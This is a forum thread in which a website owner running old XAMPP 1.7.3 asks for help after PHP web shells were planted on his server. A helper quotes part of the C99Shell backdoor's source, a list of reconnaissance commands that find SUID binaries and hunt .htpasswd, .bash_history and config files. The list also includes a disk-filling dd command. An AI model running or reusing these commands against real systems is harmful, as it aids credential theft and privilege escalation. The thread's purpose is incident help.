Windows Help!! Someone created/modified some of my php scripts on dedicated

[Gabriel Tibiano]

Heyyyyyyy guys,
someone just got acess to my archives on my dedicated computer........ HOWW?!!?!


I'M USING XAMPP 1.7.3
and my gesior is without "bugs"

they modified my email at buypoints.php and insert 2 archives at htdocs, one called lost2.php (1.7kbps) and another called gny.php(583MB)
that one, lost2.php is an "paasword page" and gny.php is an black page that make anyone acess to my directory with all files -.- WTF!?!?

CAN ANYONE HELP ME TO FIX THIS THING??!?

 

[Ninja]

Why are you using Xampp In the first place?

 

[Gabriel Tibiano]

Why are you using Xampp In the first place?

I've already tried using the UniServ and hadn't got success with the installation, but you know something about this shells?
PS: That black page gny.php at the top theres something wrote like: "SHELL" in symbols

 

[Lacuna Devoted]

Informations you gave us "Hi someone got acess to my ftp"

How should we help you?
We don't know any configuration you made, we don't know what scripts & blah you used.

Short: We know nothing.

More Infos would be great..


"something like shell" is also very inaccurate..



Edit: I forgot to say that there are 3 vulnerabilites for xampp 1.7.3



Edit2: Get the newest version of Xampp
XAMPP 1.7.7




Edit3: Would you mind to send me the lost2.php & a part of the gny.php?


Edit4: I would suggest ya to use "Mamp" anyway.. it's much better and lately even more features are working. Since the newest Xampp versions got probs. with 64bits..

 

[Gabriel Tibiano]

Informations you gave us "Hi someone got acess to my ftp"

How should we help you?
We don't know any configuration you made, we don't know what scripts & blah you used.

Short: We know nothing.

More Infos would be great..


"something like shell" is also very inaccurate..



Edit: I forgot to say that there are 3 vulnerabilites for xampp 1.7.3



Edit2: Get the newest version of Xampp
XAMPP 1.7.7




Edit3: Would you mind to send me the lost2.php & a part of the gny.php?

What more should I say for helping you guy to fixing my problem ?
This XAMPP 1.7.7 doesn't work with my gesior, i got lot of php-functions errors

gny.php returning errors when try to edit/open or even try to upload..
Both Files: *removed*
gny.php *removed*

 

[Lacuna Devoted]

Well I told ya get "MAMP" and don't use an old Xampp version wich is crowded with XSS vulnerabilites & blah..



Ps.: Lol when i try to download I already get Errors like Kaspersky Info>>> "Backdoor.PHP.C99Shell.fn" rofl.. (btw get an antivir..)

Gratulation..


(will edit this post later after I got a whole overview)




Edit.: Lol yea you simply got exploited + a flooder xD


Remove this shit old 1.7.3 xampp T.T!

[/SIZE][/SIZE][/I][/FONT]array('Currently Logged in Users', 'w'),
  array('Last User to Connect', 'lastlog'),
  array('Find Users Without a Password', 'cut -d: -f1,2,3 /etc/passwd | grep ::'),
  array('Is /etc Writable?', 'find /etc/ -type f -perm -o+w 2> /dev/null'),
  array('Installed Downloaders', 'which wget curl w3m lynx'),
  array('Open Ports', 'netstat -an | grep -i listen'),
  array('Box Uptime', 'uptime'),
  array('System Variables', 'set'),
  array('ARP table', 'arp -a'),
  array('Patch Level for RedHat 7.0', 'rpm -qa'),
  array('Network Interfaces', 'ifconfig'),
  array('Mounted Filesystems', 'mount'),
  array('[COLOR=#800080]Create 1GB File in Current Dir (for h00lyshit[/COLOR])', 'dd if=/dev/urandom of=./bigfile count=2M'),              [COLOR=#800080] lol![/COLOR]
  array('Find Suid Bins', 'find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null'),
  array("Find All Suid Files", "find / -type f -perm -04000 -ls"), 
  array("Find Suid Files in Current Dir", "find . -type f -perm -04000 -ls"), 
  array("Find All Sgid Files", "find / -type f -perm -02000 -ls"), 
  array("Find Sgid Files in Current Dir", "find . -type f -perm -02000 -ls"), 
  array("Find config.inc.php Files", "find / -type f -name config.inc.php"), 
  array("Find config* Files", "find / -type f -name \"config*\""), 
  array("Find config* Files in Current Dir", "find . -type f -name \"config*\""), 
  array("Find All Writable Folders and Files", "find / -perm -2 -ls"), 
  array("Find All Writable Folders and Files in Current Dir", "find . -perm -2 -ls"), 
  array("Find All service.pwd Files", "find / -type f -name service.pwd"), 
  array("Find service.pwd Files in Current Dir", "find . -type f -name service.pwd"), 
  array("Find All .htpasswd Files", "find / -type f -name .htpasswd"), 
  array("Find .htpasswd Files in Current Dir", "find . -type f -name .htpasswd"), 
  array("Find All .bash_history Files", "find / -type f -name .bash_history"), 
  array("Find .bash_history Files in Current Dir", "find . -type f -name .bash_history"), 
  array("Find All .fetchmailrc Files", "find / -type f -name .fetchmailrc"), 
  array("Find .fetchmailrc Files in Current Dir", "find . -type f -name .fetchmailrc"), 
  array("List File Attributes on a Linux Second Extended File System", "lsattr -va"), 
[FONT=century gothic][I][SIZE=7][SIZE=3]

 

[Gabriel Tibiano]

Well I told ya get "MAMP" and don't use an old Xampp version wich is crowded with XSS vulnerabilites & blah..



Ps.: Lol when i try to download I already get Errors like Kaspersky Info>>> "Backdoor.PHP.C99Shell.fn" rofl.. (btw get an antivir..)

Gratulation..


(will edit this post later after I got a whole overview)




Edit.: Lol yea you simply got exploited + a flooder xD


Remove this shit old 1.7.3 xampp T.T!

I've already done many advanced things to fix security from my xampp,
- like this one: http://otland.net/f14/serious-vulnerability-xampp-everyone-using-xampp-please-read-140244/
- deleting pma user, using .htacess and bla bla blaaa..

Never knew about that "MAMP" I'll try to learn something about that..
But if you could help me to fix something about this I'll be very grateful

Yeaa! my shitty anti-virus was warning too :~~

 

[Lacuna Devoted]

This fix is just one of tons!.. I really encourage ya to get the new Version.

This thing seems very cool.. sends logs,ucan acess via netcat & hah setups a proxy and blah ^^

 

[Gabriel Tibiano]

This fix is just one of tons!.. I really encourage ya to get the new Version.

This thing seems very cool.. sends logs,ucan acess via netcat & hah setups a proxy and blah ^^

(
As I said, I already tried other version of xampp, but my website return many errors with php functions ://
Theres nothing I can do? Instead of Install Xampp 1.7.7

 

[Lacuna Devoted]

Well, If you do not like to use "MAMP" get Xampp 1.7.7 & I could help ya to get in runnin'.

 

[Lacuna Devoted]

Hey,

Once you're online again go to skype and check my messages..

You didn't do what I told ya.. It's still possible to XSS yé.. (checked it)